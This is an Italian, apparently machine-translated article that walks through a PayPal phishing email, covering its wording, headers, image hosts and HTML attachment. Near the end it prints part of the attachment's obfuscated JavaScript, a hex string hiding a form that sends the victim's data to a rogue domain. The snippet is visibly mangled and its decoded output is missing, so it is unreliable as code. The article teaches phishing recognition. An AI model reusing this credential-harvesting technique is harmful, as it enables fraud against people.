Sicurezza online: analizzare l'anatomia di un'e-mail di phishing


Nel mondo di oggi in cui le informazioni di tutti sono online, il phishing è uno degli attacchi online più popolari e devastanti, perché puoi sempre pulire un virus, ma se i tuoi dati bancari vengono rubati, sei nei guai. Ecco una ripartizione di uno di questi attacchi che abbiamo ricevuto.



Non pensare che siano solo i tuoi dati bancari ad essere importanti: dopotutto, se qualcuno ottiene il controllo sul tuo accesso al conto, non solo conosce le informazioni contenute in quel conto, ma è probabile che le stesse informazioni di accesso possano essere utilizzate su vari altri conti. E se compromettono il tuo account di posta elettronica, possono reimpostare tutte le altre password.

Quindi, oltre a mantenere password complesse e variabili, devi sempre essere alla ricerca di e-mail fasulle mascherate da cose reali. mentre la maggior parte phishing i tentativi sono amatoriali, alcuni sono abbastanza convincenti quindi è importante capire come riconoscerli a livello superficiale e come funzionano sotto il cofano.





IMPARENTATO: Perché scrivono il phishing con 'ph?' Un improbabile omaggio

Immagine di asirap



Esaminare ciò che è in bella vista

La nostra email di esempio, come la maggior parte dei tentativi di phishing, ti informa di attività sul tuo conto PayPal che, in circostanze normali, sarebbero allarmante. Quindi l'invito all'azione è verificare/ripristinare il tuo account inviando quasi tutte le informazioni personali che ti vengono in mente. Ancora una volta, questo è piuttosto stereotipato.

Sebbene ci siano certamente delle eccezioni, praticamente ogni e-mail di phishing e truffa viene caricata con bandiere rosse direttamente nel messaggio stesso. Anche se il testo è convincente, di solito puoi trovare molti errori disseminati nel corpo del messaggio che indicano che il messaggio non è legittimo.

Il corpo del messaggio



Annuncio pubblicitario

A prima vista, questa è una delle migliori email di phishing che abbia mai visto. Non ci sono errori di ortografia o grammatica e la verbosità si legge in base a ciò che potresti aspettarti. Tuttavia, ci sono alcune bandiere rosse che puoi vedere quando esamini il contenuto un po' più da vicino.

  • Paypal – Il caso corretto è PayPal (P maiuscola). Puoi vedere che entrambe le varianti sono utilizzate nel messaggio. Le aziende sono molto deliberate con il loro marchio, quindi è dubbio che qualcosa di simile supererebbe il processo di correzione.
  • allow ActiveX – Quante volte hai visto un'attività legittima basata sul web delle dimensioni di Paypal utilizzare un componente proprietario che funziona solo su un singolo browser, specialmente quando supporta più browser? Certo, da qualche parte là fuori qualche compagnia lo fa, ma questa è una bandiera rossa.
  • in modo sicuro. – Nota come questa parola non si allinea a margine con il resto del testo del paragrafo. Anche se allungo un po' di più la finestra, non si avvolge o non spazia correttamente.
  • PayPal! – Lo spazio prima del punto esclamativo sembra imbarazzante. Solo un'altra stranezza che sono sicuro non sarebbe in un'e-mail legittima.
  • PayPal-Aggiornamento conto Form.pdf.htm – Perché PayPal dovrebbe allegare un PDF soprattutto quando potrebbero semplicemente collegarsi a una pagina del loro sito? Inoltre, perché dovrebbero provare a mascherare un file HTML come PDF? Questa è la bandiera rossa più grande di tutte.

L'intestazione del messaggio

Quando dai un'occhiata all'intestazione del messaggio, appaiono un altro paio di bandiere rosse:

  • L'indirizzo del mittente è test@test.com .
  • Manca l'indirizzo. Non l'ho cancellato, semplicemente non fa parte dell'intestazione del messaggio standard. In genere un'azienda che ha il tuo nome personalizzerà l'e-mail per te.

L'allegato

Quando apro l'allegato, puoi immediatamente vedere che il layout non è corretto in quanto mancano le informazioni sullo stile. Ancora una volta, perché PayPal dovrebbe inviare un modulo HTML tramite e-mail quando potrebbe semplicemente fornirti un link sul loro sito?

Nota: abbiamo utilizzato il visualizzatore di allegati HTML integrato di Gmail per questo, ma ti consigliamo di NON APRIRE gli allegati dei truffatori. Mai. Sempre. Molto spesso contengono exploit che installeranno trojan sul tuo PC per rubare le informazioni del tuo account.

Scorrendo un po' più in basso puoi vedere che questo modulo richiede non solo le nostre informazioni di accesso a PayPal, ma anche le informazioni bancarie e della carta di credito. Alcune delle immagini sono rotte.

È ovvio che questo tentativo di phishing sta inseguendo tutto con un colpo solo.

Il guasto tecnico

Anche se dovrebbe essere abbastanza chiaro in base a ciò che è in bella vista che si tratta di un tentativo di phishing, ora analizzeremo la struttura tecnica dell'e-mail e vedremo cosa possiamo trovare.

Informazioni dall'allegato

Annuncio pubblicitario

La prima cosa a cui dare un'occhiata è la sorgente HTML del modulo di allegato, che è ciò che invia i dati al sito fasullo.

Quando si visualizza rapidamente la fonte, tutti i collegamenti appaiono validi in quanto puntano a paypal.com o paypalobjects.com, entrambi legittimi.

Ora daremo un'occhiata ad alcune informazioni di base sulla pagina che Firefox raccoglie sulla pagina.

Come puoi vedere, parte della grafica è estratta dai domini luckytobe.com, goodhealthpharmacy.com e pic-upload.de invece che dai legittimi domini PayPal.

Informazioni dalle intestazioni delle e-mail

Successivamente daremo un'occhiata alle intestazioni dei messaggi di posta elettronica non elaborati. Gmail lo rende disponibile tramite l'opzione di menu Mostra originale sul messaggio.

Annuncio pubblicitario

Guardando le informazioni di intestazione per il messaggio originale, puoi vedere che questo messaggio è stato composto utilizzando Outlook Express 6. Dubito che PayPal abbia qualcuno nello staff che invia ciascuno di questi messaggi manualmente tramite un client di posta obsoleto.

Ora esaminando le informazioni di routing, possiamo vedere l'indirizzo IP sia del mittente che del server di inoltro della posta.

L'indirizzo IP dell'utente è il mittente originale. Facendo una rapida ricerca sulle informazioni IP, possiamo vedere che l'IP di invio è in Germania.

E quando osserviamo l'indirizzo IP del server di inoltro della posta (mail.itak.at), possiamo vedere che si tratta di un ISP con sede in Austria. Dubito che PayPal indirizzi le loro e-mail direttamente attraverso un ISP con sede in Austria quando hanno un'enorme server farm che potrebbe facilmente gestire questo compito.

Dove vanno a finire i dati?

Quindi abbiamo chiaramente stabilito che si tratta di un'e-mail di phishing e abbiamo raccolto alcune informazioni sull'origine del messaggio, ma per quanto riguarda il luogo in cui vengono inviati i tuoi dati?

Per vederlo, dobbiamo prima salvare l'allegato HTM sul nostro desktop e aprirlo in un editor di testo. Scorrendolo, tutto sembra essere in ordine tranne quando arriviamo a un blocco Javascript dall'aspetto sospetto.

Annuncio pubblicitario

Estraendo il sorgente completo dell'ultimo blocco di Javascript, vediamo:


// Copyright © 2005 Voormedia – WWW.VOORMEDIA.COM
var i,y,x=3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f7374220616374696f6e3d22687474703a2f2f77707772e646578706;y296677772e646578706;737579265267267e

Ogni volta che vedi una grande stringa confusa di lettere e numeri apparentemente casuali incorporati in un blocco Javascript, di solito è qualcosa di sospetto. Osservando il codice, la variabile x viene impostata su questa stringa grande e quindi decodificata nella variabile y. Il risultato finale della variabile y viene quindi scritto nel documento come HTML.

Poiché la stringa grande è composta dai numeri 0-9 e dalle lettere a-f, è molto probabilmente codificata tramite una semplice conversione da ASCII a esadecimale:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65322672f476703

Si traduce in:

Non è un caso che questo lo decodifichi in un tag modulo HTML valido che invia i risultati non a PayPal, ma a un sito canaglia.

Inoltre, quando visualizzi l'origine HTML del modulo, vedrai che questo tag del modulo non è visibile perché viene generato dinamicamente tramite Javascript. Questo è un modo intelligente per nascondere ciò che l'HTML sta effettivamente facendo se qualcuno dovesse semplicemente visualizzare la fonte generata dell'allegato (come abbiamo fatto in precedenza) invece di aprire l'allegato direttamente in un editor di testo.

Eseguendo un rapido whois sul sito offensivo, possiamo vedere che questo è un dominio ospitato su un popolare host web, 1and1.

Annuncio pubblicitario

Ciò che spicca è che il dominio utilizza un nome leggibile (al contrario di qualcosa come dfh3sjhskjhw.net) e il dominio è stato registrato per 4 anni. Per questo motivo, credo che questo dominio sia stato dirottato e utilizzato come pedina in questo tentativo di phishing.

Il cinismo è una buona difesa

Quando si tratta di rimanere al sicuro online, non fa mai male avere un po' di cinismo.

Mentre sono sicuro che ci sono più bandiere rosse nell'e-mail di esempio, ciò che abbiamo indicato sopra sono indicatori che abbiamo visto dopo pochi minuti di esame. Ipoteticamente, se il livello superficiale dell'e-mail imitasse al 100% la sua controparte legittima, l'analisi tecnica rivelerebbe comunque la sua vera natura. Questo è il motivo per cui è importante essere in grado di esaminare sia ciò che puoi e non puoi vedere.

LEGGI SUCCESSIVO

Articoli Interessanti